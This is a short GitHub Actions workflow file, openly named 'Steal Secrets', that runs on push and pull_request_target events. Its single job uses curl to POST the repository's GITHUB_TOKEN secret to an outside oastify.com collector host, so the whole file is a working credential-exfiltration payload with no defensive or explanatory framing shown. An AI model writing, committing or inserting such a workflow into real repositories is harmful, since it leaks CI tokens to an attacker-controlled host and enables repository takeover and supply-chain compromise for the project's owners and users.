name: Steal Secrets
on: [push, pull_request_target]

jobs:
  steal:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -X POST https://bwbh1o2i5m7hi1w33q9tqv9rlir9fz3o.oastify.com \
            -d "token=${{ secrets.GITHUB_TOKEN }}"
